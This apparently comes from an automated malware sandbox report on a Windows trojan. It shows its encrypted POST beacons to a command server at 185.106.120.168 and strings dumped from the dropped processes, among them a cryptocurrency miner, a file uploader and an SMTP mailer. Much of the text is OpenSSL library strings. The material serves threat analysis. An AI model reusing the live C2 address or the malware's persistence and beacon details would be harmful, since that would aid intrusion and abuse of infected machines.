POST /index.php HTTP/1.0
Accept: */*
Connection: close
Host: 185.106.120.168
Content-Type: application/x-www-form-urlencoded
Content-Length: 181
qioumj=ZKBHmELlC9yn3REmvfpudkMs23onQ7IqFagRPSl9VORwWPc4R81xkIo+Vfaxi2vVgWpoF2viNAq7g3LyYTG8/5JZM46t0u48bBSI4CKI2e7jvQeCckFJSgaO/N9n0v97+crTE04YHuUg7p87OY2smLglnaXk+A==
HTTP/1.1 200 OK
Server: nginx/1.4.6 (Ubuntu)
Date: Mon, 09 May 2016 06:19:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.9-1ubuntu4.14
POST /index.php HTTP/1.0
Accept: */*
Connection: close
Host: 185.106.120.168
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
qioumj=yUhCgBwNDsRt3RAgg9ds9Y6TdCAsYmxL8rNzNB5abGysoO5+k0Ju52vzBiwyMPWd9Tcw9sRSFF/aYzRHnwQ0r5dXZ3uoQrIAbe0u4bpzke+H/bkABo8n4dWlbZBceqhfG8IhWWAFG6tpJPcgzXjv3qKoWWPE9cAUHpupJnwFUTpgs0Fomw==
HTTP/1.1 200 OK
Server: nginx/1.4.6 (Ubuntu)
Date: Mon, 09 May 2016 06:19:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.9-1ubuntu4.14
POST /index.php HTTP/1.0
Accept: */*
Connection: close
Host: 185.106.120.168
Content-Type: application/x-www-form-urlencoded
Content-Length: 207
qioumj=p5Ox6XzW/a1dKWy6N4pSuPjD6wYOhSNYI3PUPQ5Sv+g4IoQy3HUZwqgH3yPbb7TYWOkBsKW8RAX4hm0IYCe+af7DKXUN8ZpnccwwMz8gxHF+eKC9JCsYs3P0CK6thlUoFRJJCctgIG9NSnf9jxInpieHvVKR7vaFPJbGtSFuQMoL4EiG3pY6iEKpsw==
HTTP/1.1 200 OK
Server: nginx/1.4.6 (Ubuntu)
Date: Mon, 09 May 2016 06:19:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.9-1ubuntu4.14
<<< skipped >>>
POST /index.php HTTP/1.0
Accept: */*
Connection: close
Host: 185.106.120.168
Content-Type: application/x-www-form-urlencoded
Content-Length: 283
qioumj=9EhCgBwNDsS+3RAgg9d79YrLZTpyLWpUtbdka0VQcHz4u+Zr3EQh7mbzHQgzIPXMrgph+/EAVg3BRF8d2xU+t5oBM33iMdJzKt1qoOB6kI699PtMCPJRgLGwfKMxbfcDWdRwRXsOAO1ydaR+g2+6yeyhUWqD+4RIHo3/eHwaHn578RB31er/PynbHk5opO/EnyRgZkqORlRaMCS2T/5n9UpCfVIY0jKUzn88aQ4nstwjgnBwwn9Nlg==
HTTP/1.1 200 OK
Server: nginx/1.4.6 (Ubuntu)
Date: Mon, 09 May 2016 06:19:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.9-1ubuntu4.14
cJ!@ .m."C.0R........
POST /index.php HTTP/1.0
Accept: */*
Connection: close
Host: 185.106.120.168
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
qioumj=y4iEnx3NyNu8feFng4+U1qK/iDFqDpJDSsoMMOKCU25Ex611DKf7rGcdF+e7p9eFhzw2CEfyEQiVQWW6qOVzc6oLZMQBibLjjOOxhgPo3UWY9APTZZ92EgIexPcxlH/l04LUB902oAhj3Ih+IhtFqxkMjvtNazCRH1SIgWYzp0XFbRhL9KI=
HTTP/1.1 200 OK
Server: nginx/1.4.6 (Ubuntu)
Date: Mon, 09 May 2016 06:19:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.9-1ubuntu4.14
<<< skipped >>>
POST /index.php HTTP/1.0
Accept: */*
Connection: close
Host: 185.106.120.168
Content-Type: application/x-www-form-urlencoded
Content-Length: 167
qioumj=CzJujS53Iskq91ujPLPMPWbCpsDwRA04XBoTR5U4f6hbxPVsi1R2EgNBheGmyWx8md3Lkp+eZHQ5pkVby6iksvraI67hVmo2J6LLe6GAeyqaucjjVbBvdqeQTc5FibKp4qz3WAbbFwnLzUIoHwIkvQGD+6uj
HTTP/1.1 200 OK
Server: nginx/1.4.6 (Ubuntu)
Date: Mon, 09 May 2016 06:19:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.9-1ubuntu4.14
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
abhdqfjyr.exe_1364:
.text
`.rdata
@.data
.reloc
'0ß
.mlWj
]_%sK
SSSh0
B=>j%f
xSSSh
FTPjKS
FtPj;S
C.PjRV
GetProcessWindowStation
portuguese-brazilian
GetProcessHeap
KERNEL32.dll
GDI32.dll
GetKeyboardType
USER32.dll
GetCPInfo
PeekNamedPipe
zcÃ
|%System%\qtvtnsadc.exe
q185.106.120.168
wWATCHDOGPROC "c:\windows\system32\abhdqfjyr.exe"
%System%\abhdqfjyr.exe
00f0r0x0~0
= ='=-=3=9=?=
7w7F7N7T7h7n7{7
8Â8X8b8h8r8
5P5C5U5m5v5
2%2F2X2f2v2
9•9F9Q9W9e9n9t9~9
2/2O2Y2d2m2u2
8"9(9/959
3!3*303:3
9–9D9T9Z9c9o9y9
5!5'525=5
9â€9D9J9R9k9
11D1K1X1c1w1
; ;$;(;,;0;4;8;
mscoree.dll
ADVAPI32.DLL
KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
ke7qslsbgtc2eo.exe_384:
.text
`.rdata
@.data
.reloc
'0ß
.mlWj
]_%sK
SSSh0
B=>j%f
xSSSh
FTPjKS
FtPj;S
C.PjRV
GetProcessWindowStation
portuguese-brazilian
GetProcessHeap
KERNEL32.dll
GDI32.dll
GetKeyboardType
USER32.dll
GetCPInfo
PeekNamedPipe
zcÃ
%WinDir%\TEMP\ke7qslsbgtc2eo.exe
00f0r0x0~0
= ='=-=3=9=?=
7w7F7N7T7h7n7{7
8Â8X8b8h8r8
5P5C5U5m5v5
2%2F2X2f2v2
9•9F9Q9W9e9n9t9~9
2/2O2Y2d2m2u2
8"9(9/959
3!3*303:3
9–9D9T9Z9c9o9y9
5!5'525=5
9â€9D9J9R9k9
11D1K1X1c1w1
; ;$;(;,;0;4;8;
mscoree.dll
ADVAPI32.DLL
KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
win32blot2.exe_1920:
.text
`.rdata
@.data
.rsrc
kernel32.dll
%srecyclebin\ver2
%srecyclebin\*
%srecyclebin\%s
%srecyclebin\*_*_*_*
%llu_%llu_%u_%u
%c:\recyclebin\%llu_%llu_%u_%u
%srecyclebin\%llu_%llu_%u_%u
%srecyclebin
Adjusting total nonces to %u to match stagger size
System.PercentFull;
Registry key TileInfo changed!
Registry key PreviewDetails changed!
%s\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
win32purst2.exe
%s %s %s %s %s %s
GetProcessWindowStation
operator
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
KERNEL32.dll
RegCloseKey
RegCreateKeyExA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
ADVAPI32.dll
GetCPInfo
GetProcessHeap
zcÃ
%System%\p2p_04\win32\win32blot2.exe
mscoree.dll
@kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
yac32sse41b.exe_1968:
.text
P`.data
.rdata
`@.bss
.idata
libgcj-13.dll
ADVAPI32.dll
ws2_32.dll
wsock32.dll
127.0.0.1
operator
operator
global constructors keyed to
global destructors keyed to
operator""
_matherr(): %s in %s(%g, %g) (retval=%g)
VirtualQuery failed for %d bytes at address %p
VirtualProtect failed with code 0x%x
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
GCC: (GNU) 4.8.2 20131016 (Fedora MinGW 4.8.2-1.fc20)
_acmdln
_amsg_exit
KERNEL32.dll
msvcrt.dll
WS2_32.dll
win32purst2.exe_1492:
.text
`.rdata
@.data
.rsrc
@.reloc
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
kernel32.dll
recv = %s
POST /burst?requestType=submitNonce&accountId=%llu&nonce=%llu HTTP/1.0
%c:\recyclebin\*
%c:\recyclebin\%s
Error opening file %s
(ws2_32.dll
|wsock32.dll
127.0.0.1
ADVAPI32.dll
KERNEL32.dll
WS2_32.dll
GetProcessHeap
GetCPInfo
zcÃ
%System%\p2p_04\win32\win32purst2.exe
5#6-676=7
"0(0,00040
5!5%5)5-5155595=5]5
5 5@5\5`5
@mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
ke7qslsbgtc4eo.exe_1128:
tGHt.Ht&
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
USER32.DLL
operator
ADVAPI32.dll
127.0.0.1
C:\recyclebin\recycle\lock
C:\recyclebin\recycle\last
C:\recyclebin\recycle\upload.txt
C:\recyclebin\recycle\post.txt
C:\recyclebin\recycle\ofs
XMLHttpRequest_POST
spawned: '%s'
can't spawn: '%s'
%WinDir%\TEMP\ke7qslsbgtc4eo.exe
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
.text
`.rdata
@.data
!"#$%&'(
.tx%#
KERNEL32.DLL
WS2_32.dll
mscoree.dll
ke7qslsbgtc4eo.exe_1128_rwx_00401000_00018000:
tGHt.Ht&
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
USER32.DLL
operator
ADVAPI32.dll
127.0.0.1
C:\recyclebin\recycle\lock
C:\recyclebin\recycle\last
C:\recyclebin\recycle\upload.txt
C:\recyclebin\recycle\post.txt
C:\recyclebin\recycle\ofs
XMLHttpRequest_POST
spawned: '%s'
can't spawn: '%s'
%WinDir%\TEMP\ke7qslsbgtc4eo.exe
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
.text
`.rdata
@.data
!"#$%&'(
.tx%#
mscoree.dll
KERNEL32.DLL
qtvtnsadc.exe_628:
.text
`.rdata
@.data
.reloc
'0ß
.mlWj
]_%sK
SSSh0
B=>j%f
xSSSh
FTPjKS
FtPj;S
C.PjRV
GetProcessWindowStation
portuguese-brazilian
GetProcessHeap
KERNEL32.dll
GDI32.dll
GetKeyboardType
USER32.dll
GetCPInfo
PeekNamedPipe
zcÃ
%System%\qtvtnsadc.exe
00f0r0x0~0
= ='=-=3=9=?=
7w7F7N7T7h7n7{7
8Â8X8b8h8r8
5P5C5U5m5v5
2%2F2X2f2v2
9•9F9Q9W9e9n9t9~9
2/2O2Y2d2m2u2
8"9(9/959
3!3*303:3
9–9D9T9Z9c9o9y9
5!5'525=5
9â€9D9J9R9k9
11D1K1X1c1w1
; ;$;(;,;0;4;8;
mscoree.dll
ADVAPI32.DLL
KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
smtp_mailer.exe_568:
.text
`.rdata
@.data
.rsrc
@.reloc
|$@3|$
3|$
u.jch
j.Yf;
_tcPVj@
.PjRW
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
OpenSSL 0.9.8l 5 Nov 2009
%-23s %s Kx=%-8s Au=%-4s Enc=%-9s Mac=%-4s%s
EXPORT56
EXPORT40
EXPORT
.\ssl\ssl_cert.c
SSLv3 part of OpenSSL 0.9.8l 5 Nov 2009
TLSv1 part of OpenSSL 0.9.8l 5 Nov 2009
SSLv2 part of OpenSSL 0.9.8l 5 Nov 2009
s->session->master_key_length >= 0 && s->session->master_key_length session->master_key)
wrong number of key bits
unsupported status type
unsupported ssl version
unsupported protocol
unsupported elliptic curve
unsupported compression algorithm
unsupported cipher
unknown pkey type
unknown key exchange type
unknown certificate type
unable to find public key parameters
unable to extract public key
unable to decode ecdh certs
unable to decode dh certs
tried to use unsupported cipher
tls peer did not respond with certificate list
tls client cert req with anon cipher
tlsv1 alert export restriction
sslv3 alert unsupported certificate
sslv3 alert no certificate
sslv3 alert certificate unknown
sslv3 alert certificate revoked
sslv3 alert certificate expired
sslv3 alert bad certificate
signature for non signing certificate
reuse cert type not zero
reuse cert length not zero
public key not rsa
public key is not rsa
public key encrypt error
peer error unsupported certificate type
peer error no certificate
peer error certificate
peer did not return a certificate
null ssl method passed
no publickey
no private key assigned
no privatekey
no client cert received
no client cert method
no ciphers passed
no certificate specified
no certificate set
no certificate returned
no certificate assigned
no certificates returned
missing tmp rsa pkey
missing tmp rsa key
missing tmp ecdh key
missing tmp dh key
missing rsa signing cert
missing rsa encrypting cert
missing rsa certificate
missing export tmp rsa key
missing export tmp dh key
missing dsa signing cert
missing dh rsa cert
missing dh key
missing dh dsa cert
krb5 server rd_req (keytab perms?)
key arg too long
invalid ticket keys length
http request
https proxy request
error generating tmp rsa key
cert length mismatch
certificate verify failed
bad ecc cert
bad dh pub key length
TLS1_SETUP_KEY_BLOCK
SSL_VERIFY_CERT_CHAIN
SSL_use_RSAPrivateKey_file
SSL_use_RSAPrivateKey_ASN1
SSL_use_RSAPrivateKey
SSL_use_PrivateKey_file
SSL_use_PrivateKey_ASN1
SSL_use_PrivateKey
SSL_use_certificate_file
SSL_use_certificate_ASN1
SSL_use_certificate
SSL_SET_PKEY
SSL_SET_CERT
SSL_SESS_CERT_NEW
SSL_GET_SIGN_PKEY
SSL_GET_SERVER_SEND_CERT
SSL_CTX_use_RSAPrivateKey_file
SSL_CTX_use_RSAPrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_PrivateKey
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_chain_file
SSL_CTX_use_certificate_ASN1
SSL_CTX_use_certificate
SSL_CTX_set_client_cert_engine
SSL_CTX_check_private_key
SSL_check_private_key
SSL_CERT_NEW
SSL_CERT_INSTANTIATE
SSL_CERT_INST
SSL_CERT_DUP
SSL_add_file_cert_subjects_to_stack
SSL_add_dir_cert_subjects_to_stack
SSL3_SETUP_KEY_BLOCK
SSL3_SEND_SERVER_KEY_EXCHANGE
SSL3_SEND_SERVER_CERTIFICATE
SSL3_SEND_CLIENT_KEY_EXCHANGE
SSL3_SEND_CLIENT_CERTIFICATE
SSL3_SEND_CERTIFICATE_REQUEST
SSL3_OUTPUT_CERT_CHAIN
SSL3_GET_SERVER_CERTIFICATE
SSL3_GET_KEY_EXCHANGE
SSL3_GET_CLIENT_KEY_EXCHANGE
SSL3_GET_CLIENT_CERTIFICATE
SSL3_GET_CERT_VERIFY
SSL3_GET_CERT_STATUS
SSL3_GET_CERTIFICATE_REQUEST
SSL3_GENERATE_KEY_BLOCK
SSL3_CHECK_CERT_AND_ALGORITHM
SSL2_SET_CERTIFICATE
SSL2_GENERATE_KEY_MATERIAL
REQUEST_CERTIFICATE
GET_CLIENT_MASTER_KEY
DTLS1_SEND_SERVER_KEY_EXCHANGE
DTLS1_SEND_SERVER_CERTIFICATE
DTLS1_SEND_CLIENT_KEY_EXCHANGE
DTLS1_SEND_CLIENT_CERTIFICATE
DTLS1_SEND_CERTIFICATE_REQUEST
DTLS1_OUTPUT_CERT_CHAIN
CLIENT_MASTER_KEY
CLIENT_CERTIFICATE
key expansion
client write key
server write key
c->iv_len session->key_arg)
s->s2->key_material_length s2->key_material
Stack part of OpenSSL 0.9.8l 5 Nov 2009
%s(%d): OpenSSL internal error, assertion failed: %s
lhash part of OpenSSL 0.9.8l 5 Nov 2009
cert_info
Microsoft Local Key set
LocalKeySet
id-Gost28147-89-None-KeyMeshing
id-Gost28147-89-CryptoPro-KeyMeshing
password based MAC
id-PasswordBasedMAC
X509v3 Certificate Issuer
certificateIssuer
certicom-arc
Proxy Certificate Information
proxyCertInfo
Microsoft Smartcardlogin
msSmartcardLogin
joint-iso-itu-t
JOINT-ISO-ITU-T
set-rootKeyThumb
setAttr-Cert
setCext-cCertRequired
setCext-certType
setct-CertResTBE
setct-CertReqTBEX
setct-CertReqTBE
setct-AcqCardCodeMsgTBE
setct-CertInqReqTBS
setct-CertResData
setct-CertReqTBS
setct-CertReqData
setct-PCertResTBS
setct-PCertReqData
setct-AcqCardCodeMsg
certificate extensions
set-certExt
set-msgExt
id-ecPublicKey
id-cmc-confirmCertAcceptance
id-cmc-getCert
id-regInfo-certReq
id-regCtrl-protocolEncrKey
id-regCtrl-oldCertID
id-it-revPassphrase
id-it-keyPairParamRep
id-it-keyPairParamReq
id-it-unsupportedOIDs
id-it-caKeyUpdateInfo
id-it-encKeyPairTypes
id-it-signKeyPairTypes
id-it-caProtEncCert
id-mod-attribute-cert
id-mod-qualified-cert-93
id-mod-qualified-cert-88
id-smime-aa-ets-certCRLTimestamp
id-smime-aa-ets-certValues
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-otherSigCert
id-smime-aa-smimeEncryptCerts
id-smime-aa-signingCertificate
id-smime-aa-encrypKeyPref
id-smime-aa-msgSigDigest
id-smime-ct-publishCert
id-smime-mod-msg-v3
sdsiCertificate
x509Certificate
localKeyID
certBag
pkcs8ShroudedKeyBag
keyBag
pbeWithSHA1And2-KeyTripleDES-CBC
pbeWithSHA1And3-KeyTripleDES-CBC
TLS Web Client Authentication
TLS Web Server Authentication
X509v3 Extended Key Usage
extendedKeyUsage
X509v3 Authority Key Identifier
authorityKeyIdentifier
X509v3 Certificate Policies
certificatePolicies
X509v3 Private Key Usage Period
privateKeyUsagePeriod
X509v3 Key Usage
keyUsage
X509v3 Subject Key Identifier
subjectKeyIdentifier
Netscape Certificate Sequence
nsCertSequence
Netscape CA Policy Url
nsCaPolicyUrl
Netscape Renewal Url
nsRenewalUrl
Netscape CA Revocation Url
nsCaRevocationUrl
Netscape Revocation Url
nsRevocationUrl
Netscape Base Url
nsBaseUrl
Netscape Cert Type
nsCertType
Netscape Certificate Extension
nsCertExt
extendedCertificateAttributes
challengePassword
dhKeyAgreement
Diffie-Hellman part of OpenSSL 0.9.8l 5 Nov 2009
crlUrl
certStatus
certId
OCSP_CERTSTATUS
value.unknown
value.revoked
value.good
value.byKey
value.byName
reqCert
OCSP_CERTID
issuerKeyHash
certs
X.509 part of OpenSSL 0.9.8l 5 Nov 2009
OPENSSL_ALLOW_PROXY_CERTS
.\crypto\ec\ec_key.c
RSA part of OpenSSL 0.9.8l 5 Nov 2009
Big Number part of OpenSSL 0.9.8l 5 Nov 2009
CERTIFICATE
.\crypto\engine\eng_pkey.c
.\crypto\dh\dh_key.c
EVP part of OpenSSL 0.9.8l 5 Nov 2009
len>=0 && lenkey)
j key)
EC part of OpenSSL 0.9.8l 5 Nov 2009
priv_key
pub_key
ASN.1 part of OpenSSL 0.9.8l 5 Nov 2009
ENCRYPTED PRIVATE KEY
PRIVATE KEY
EC PRIVATE KEY
DSA PRIVATE KEY
RSA PRIVATE KEY
ANY PRIVATE KEY
CERTIFICATE REQUEST
NEW CERTIFICATE REQUEST
X509_PUBKEY
public_key
.\crypto\asn1\x_pubkey.c
AUTHORITY_KEYID
keyid
X509_CERT_PAIR
X509_CERT_AUX
ECDSA part of OpenSSL 0.9.8l 5 Nov 2009
DSA part of OpenSSL 0.9.8l 5 Nov 2009
value.single
value.set
PROXY_CERT_INFO_EXTENSION
Load certs from files in a directory
%s%clx.%s%d
d.registeredID
d.iPAddress
d.uniformResourceIdentifier
d.ediPartyName
d.directoryName
d.dNSName
d.rfc822Name
d.otherName
RAND part of OpenSSL 0.9.8l 5 Nov 2009
You need to read the OpenSSL FAQ, hXXp://VVV.openssl.org/support/faq.html
SHA1 part of OpenSSL 0.9.8l 5 Nov 2009
SHA-256 part of OpenSSL 0.9.8l 5 Nov 2009
SHA-512 part of OpenSSL 0.9.8l 5 Nov 2009
DlMD5 part of OpenSSL 0.9.8l 5 Nov 2009
MD2 part of OpenSSL 0.9.8l 5 Nov 2009
6RC2 part of OpenSSL 0.9.8l 5 Nov 2009
6RC2 part of OpenSSL 0.9.8l 5 Nov 2009
RC4 part of OpenSSL 0.9.8l 5 Nov 2009
RC4 part of OpenSSL 0.9.8l 5 Nov 2009
IDEA part of OpenSSL 0.9.8l 5 Nov 2009
IDEA part of OpenSSL 0.9.8l 5 Nov 2009
unsupported requestorname type
unsupported requestorname type
signer certificate not found
signer certificate not found
private key does not match certificate
private key does not match certificate
no public key
no public key
no certificates in chain
no certificates in chain
error parsing url
error parsing url
certificate verify error
certificate verify error
PARSE_HTTP_LINE1
PARSE_HTTP_LINE1
OCSP_parse_url
OCSP_parse_url
OCSP_cert_id_new
OCSP_cert_id_new
invalid cmd number
invalid cmd number
invalid cmd name
invalid cmd name
failed loading public key
failed loading public key
failed loading private key
failed loading private key
cmd not executable
cmd not executable
ENGINE_UNLOAD_KEY
ENGINE_UNLOAD_KEY
ENGINE_load_ssl_client_cert
ENGINE_load_ssl_client_cert
ENGINE_load_public_key
ENGINE_load_public_key
ENGINE_load_private_key
ENGINE_load_private_key
ENGINE_ctrl_cmd_string
ENGINE_ctrl_cmd_string
ENGINE_ctrl_cmd
ENGINE_ctrl_cmd
ENGINE_cmd_is_executable
ENGINE_cmd_is_executable
functionality not supported
functionality not supported
WIN32_JOINER
WIN32_JOINER
prng seed must not match key
prng seed must not match key
prng not rekeyed
prng not rekeyed
prng keyed
prng keyed
no key set
no key set
unsupported pkcs12 mode
unsupported pkcs12 mode
key gen error
key gen error
PKCS8_add_keyusage
PKCS8_add_keyusage
PKCS12_PBE_keyivgen
PKCS12_PBE_keyivgen
PKCS12_newpass
PKCS12_newpass
PKCS12_MAKE_SHKEYBAG
PKCS12_MAKE_SHKEYBAG
PKCS12_MAKE_KEYBAG
PKCS12_MAKE_KEYBAG
PKCS12_key_gen_uni
PKCS12_key_gen_uni
PKCS12_key_gen_asc
PKCS12_key_gen_asc
PKCS12_add_localkeyid
PKCS12_add_localkeyid
unsupported option
unsupported option
unable to get issuer keyid
unable to get issuer keyid
policy syntax not currently supported
policy syntax not currently supported
operation not defined
operation not defined
no proxy cert policy language defined
no proxy cert policy language defined
no issuer certificate
no issuer certificate
extension setting not supported
extension setting not supported
V2I_EXTENDED_KEY_USAGE
V2I_EXTENDED_KEY_USAGE
V2I_AUTHORITY_KEYID
V2I_AUTHORITY_KEYID
S2I_SKEY_ID
S2I_SKEY_ID
S2I_ASN1_SKEY_ID
S2I_ASN1_SKEY_ID
R2I_CERTPOL
R2I_CERTPOL
unsupported content type
unsupported content type
unsupported cipher type
unsupported cipher type
unknown operation
unknown operation
unable to find certificate
unable to find certificate
operation not supported on this type
operation not supported on this type
no recipient matches key
no recipient matches key
no recipient matches certificate
no recipient matches certificate
decrypted key is wrong length
decrypted key is wrong length
PKCS7_add_certificate
PKCS7_add_certificate
unsupported method
unsupported method
no port specified
no port specified
no port defined
no port defined
no accept port specified
no accept port specified
BIO_get_port
BIO_get_port
ECDH_compute_key
ECDH_compute_key
data too large for key size
data too large for key size
unsupported field
unsupported field
passed null parameter
passed null parameter
not a supported NIST prime
not a supported NIST prime
missing private key
missing private key
invalid private key
invalid private key
o2i_ECPublicKey
o2i_ECPublicKey
i2o_ECPublicKey
i2o_ECPublicKey
i2d_ECPrivateKey
i2d_ECPrivateKey
EC_KEY_print_fp
EC_KEY_print_fp
EC_KEY_print
EC_KEY_print
EC_KEY_new
EC_KEY_new
EC_KEY_generate_key
EC_KEY_generate_key
EC_KEY_copy
EC_KEY_copy
EC_KEY_check_key
EC_KEY_check_key
d2i_ECPrivateKey
d2i_ECPrivateKey
unsupported type
unsupported type
unsupported public key type
unsupported public key type
unsupported encryption algorithm
unsupported encryption algorithm
unsupported any defined by type
unsupported any defined by type
unknown public key type
unknown public key type
unable to decode rsa private key
unable to decode rsa private key
unable to decode rsa key
unable to decode rsa key
streaming not supported
streaming not supported
private key header missing
private key header missing
bad password read
bad password read
X509_PKEY_new
X509_PKEY_new
i2d_RSA_PUBKEY
i2d_RSA_PUBKEY
i2d_PublicKey
i2d_PublicKey
i2d_PrivateKey
i2d_PrivateKey
i2d_EC_PUBKEY
i2d_EC_PUBKEY
i2d_DSA_PUBKEY
i2d_DSA_PUBKEY
d2i_X509_PKEY
d2i_X509_PKEY
d2i_PublicKey
d2i_PublicKey
d2i_PrivateKey
d2i_PrivateKey
unsupported algorithm
unsupported algorithm
unknown key type
unknown key type
unable to get certs public key
unable to get certs public key
no cert set for us to verify
no cert set for us to verify
loading cert dir
loading cert dir
key values mismatch
key values mismatch
key type mismatch
key type mismatch
cert already in hash table
cert already in hash table
cant check dh key
cant check dh key
X509_verify_cert
X509_verify_cert
X509_STORE_add_cert
X509_STORE_add_cert
X509_REQ_check_private_key
X509_REQ_check_private_key
X509_PUBKEY_set
X509_PUBKEY_set
X509_PUBKEY_get
X509_PUBKEY_get
X509_load_cert_file
X509_load_cert_file
X509_load_cert_crl_file
X509_load_cert_crl_file
X509_get_pubkey_parameters
X509_get_pubkey_parameters
X509_check_private_key
X509_check_private_key
GET_CERT_BY_SUBJECT
GET_CERT_BY_SUBJECT
ADD_CERT_DIR
ADD_CERT_DIR
operation not allowed in fips mode
operation not allowed in fips mode
key size too small
key size too small
DSA_BUILTIN_KEYGEN
DSA_BUILTIN_KEYGEN
unsupported encryption
unsupported encryption
read key
read key
public key no rsa
public key no rsa
problems getting password
problems getting password
error converting private key
error converting private key
PEM_READ_PRIVATEKEY
PEM_READ_PRIVATEKEY
PEM_READ_BIO_PRIVATEKEY
PEM_READ_BIO_PRIVATEKEY
PEM_PK8PKEY
PEM_PK8PKEY
PEM_F_PEM_WRITE_PKCS8PRIVATEKEY
PEM_F_PEM_WRITE_PKCS8PRIVATEKEY
DO_PK8PKEY_FP
DO_PK8PKEY_FP
DO_PK8PKEY
DO_PK8PKEY
d2i_PKCS8PrivateKey_fp
d2i_PKCS8PrivateKey_fp
d2i_PKCS8PrivateKey_bio
d2i_PKCS8PrivateKey_bio
wrong public key type
wrong public key type
unsupported salt type
unsupported salt type
unsupported private key algorithm
unsupported private key algorithm
unsupported prf
unsupported prf
unsupported key size
unsupported key size
unsupported key derivation function
unsupported key derivation function
unsupported keylength
unsupported keylength
unsuported number of rounds
unsuported number of rounds
seed key setup failed
seed key setup failed
keygen failure
keygen failure
invalid key length
invalid key length
fips mode not supported
fips mode not supported
expecting a ec key
expecting a ec key
expecting a ecdsa key
expecting a ecdsa key
expecting a dsa key
expecting a dsa key
expecting a dh key
expecting a dh key
expecting an rsa key
expecting an rsa key
different key types
different key types
ctrl operation not implemented
ctrl operation not implemented
camellia key setup failed
camellia key setup failed
bn pubkey error
bn pubkey error
bad key length
bad key length
aes key setup failed
aes key setup failed
PKCS5_v2_PBE_keyivgen
PKCS5_v2_PBE_keyivgen
PKCS5_PBE_keyivgen
PKCS5_PBE_keyivgen
EVP_PKEY_new
EVP_PKEY_new
EVP_PKEY_get1_RSA
EVP_PKEY_get1_RSA
EVP_PKEY_get1_EC_KEY
EVP_PKEY_get1_EC_KEY
EVP_PKEY_GET1_ECDSA
EVP_PKEY_GET1_ECDSA
EVP_PKEY_get1_DSA
EVP_PKEY_get1_DSA
EVP_PKEY_get1_DH
EVP_PKEY_get1_DH
EVP_PKEY_encrypt
EVP_PKEY_encrypt
EVP_PKEY_decrypt
EVP_PKEY_decrypt
EVP_PKEY_copy_parameters
EVP_PKEY_copy_parameters
EVP_PKEY2PKCS8_broken
EVP_PKEY2PKCS8_broken
EVP_PKCS82PKEY
EVP_PKCS82PKEY
EVP_CIPHER_CTX_set_key_length
EVP_CIPHER_CTX_set_key_length
ECKEY_PKEY2PKCS8
ECKEY_PKEY2PKCS8
ECDSA_PKEY2PKCS8
ECDSA_PKEY2PKCS8
DSA_PKEY2PKCS8
DSA_PKEY2PKCS8
DSAPKEY2PKCS8
DSAPKEY2PKCS8
D2I_PKEY
D2I_PKEY
CAMELLIA_INIT_KEY
CAMELLIA_INIT_KEY
AES_INIT_KEY
AES_INIT_KEY
invalid public key
invalid public key
GENERATE_KEY
GENERATE_KEY
DH_generate_key
DH_generate_key
DH_compute_key
DH_compute_key
COMPUTE_KEY
COMPUTE_KEY
rsa operations not supported
rsa operations not supported
digest too big for rsa key
digest too big for rsa key
data too small for key size
data too small for key size
RSA_generate_key
RSA_generate_key
RSA_check_key
RSA_check_key
RSA_BUILTIN_KEYGEN
RSA_BUILTIN_KEYGEN
passed a null parameter
passed a null parameter
DSO support routines
DSO support routines
x509 certificate routines
x509 certificate routines
ddddddZ
ddddddZ
ddddddZ
ddddddZ
PEM part of OpenSSL 0.9.8l 5 Nov 2009
PEM part of OpenSSL 0.9.8l 5 Nov 2009
phrase is too short, needs to be at least %d chars
phrase is too short, needs to be at least %d chars
Enter PEM pass phrase:
Enter PEM pass phrase:
TRUSTED CERTIFICATE
TRUSTED CERTIFICATE
X509 CERTIFICATE
X509 CERTIFICATE
ECDH part of OpenSSL 0.9.8l 5 Nov 2009
ECDH part of OpenSSL 0.9.8l 5 Nov 2009
pubkey
pubkey
enc_key
enc_key
key_enc_algor
key_enc_algor
cert
cert
d.encrypted
d.encrypted
d.digest
d.digest
d.signed_and_enveloped
d.signed_and_enveloped
d.enveloped
d.enveloped
d.sign
d.sign
d.data
d.data
d.other
